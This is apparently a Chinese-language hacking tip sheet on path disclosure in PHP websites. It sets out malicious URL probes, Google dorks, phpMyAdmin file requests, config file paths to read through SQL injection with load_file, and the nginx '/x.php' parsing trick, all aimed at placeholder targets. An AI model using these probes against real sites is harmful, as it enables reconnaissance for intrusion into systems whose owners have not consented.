1、單引號爆路徑 直接在URL後面加單引號,要求單引號沒有被過濾(gpc=off)且伺服器預設返回錯誤資訊。 www.xxx.com /news.php?id=149′ 2、錯誤參數值爆路徑 將要提交的參數值改成錯誤值,比如-1。單引號被過濾時不妨試試。 www.xxx.com /researcharchive.php?id=-1 3、Google爆路徑 結合關鍵字和site文法搜尋出錯頁面的網頁快照,常見關鍵字有warning和fatal error。注意,如果目標網站是次層網域,site接的是其對應的頂級網域名稱,這樣得到的資訊要多得多。 Site:2cto.com warning Site:2cto.com “fatal error” 4、測試檔案爆路徑 很多網站的根目錄下都存在測試檔案,指令碼代碼通常都是phpinfo()。 www.xxx.com /test.php www.xxx.com /ceshi.php www.xxx.com /info.php www.xxx.com phpinfo.php www.xxx.com /php_info.php www.xxx.com /1.php 5、phpmyadmin爆路徑 一旦找到phpmyadmin的管理頁面,再訪問該目錄下的某些特定檔案,就很有可能爆出實體路徑。至於phpmyadmin的地址可以用wwwscan這類的工具去掃,也可以選擇google。PS:有些BT網站會寫成phpMyAdmin。 www.xxx.com /phpmyadmin/themes/darkblue_orange/layout.inc.php www.xxx.com /phpmyadmin/libraries/select_lang.lib.php www.xxx.com /phpmyadmin/index.php?lang[]=1 6、設定檔找路徑 如果注入點有檔案讀取許可權,就可以手工load_file或工具讀取設定檔,再從中尋找路徑資訊(一般在檔案末尾)。各平台下Web伺服器和PHP的設定檔預設路徑可以上網查,這裡列舉常見的幾個。 Windows: c:\windows\php.ini php設定檔 c:\windows\system32\inetsrv\MetaBase.xml IIS虛擬機器主機設定檔 Linux: /etc/php.ini php設定檔 /etc/httpd/conf.d/php.conf /etc/httpd/conf/httpd.conf Apache設定檔 /usr/local/apache/conf/httpd.conf /usr/local/apache2/conf/httpd.conf /usr/local/apache/conf/extra/httpd-vhosts.conf 虛擬目錄設定檔 7、nginx檔案類型錯誤解析爆路徑 這是昨天無意中發現的方法,當然要求Web伺服器是nginx,且存在檔案類型解析漏洞。有時在圖片地址後加/x.php,該圖片不但會被當作php檔案執行,還有可能爆出實體路徑。 www.xxx.com /top.jpg/x.php 8、其他 其他就是像dedecms、phpwind之類的整站程式爆路徑漏洞,比較雜,通用性不強。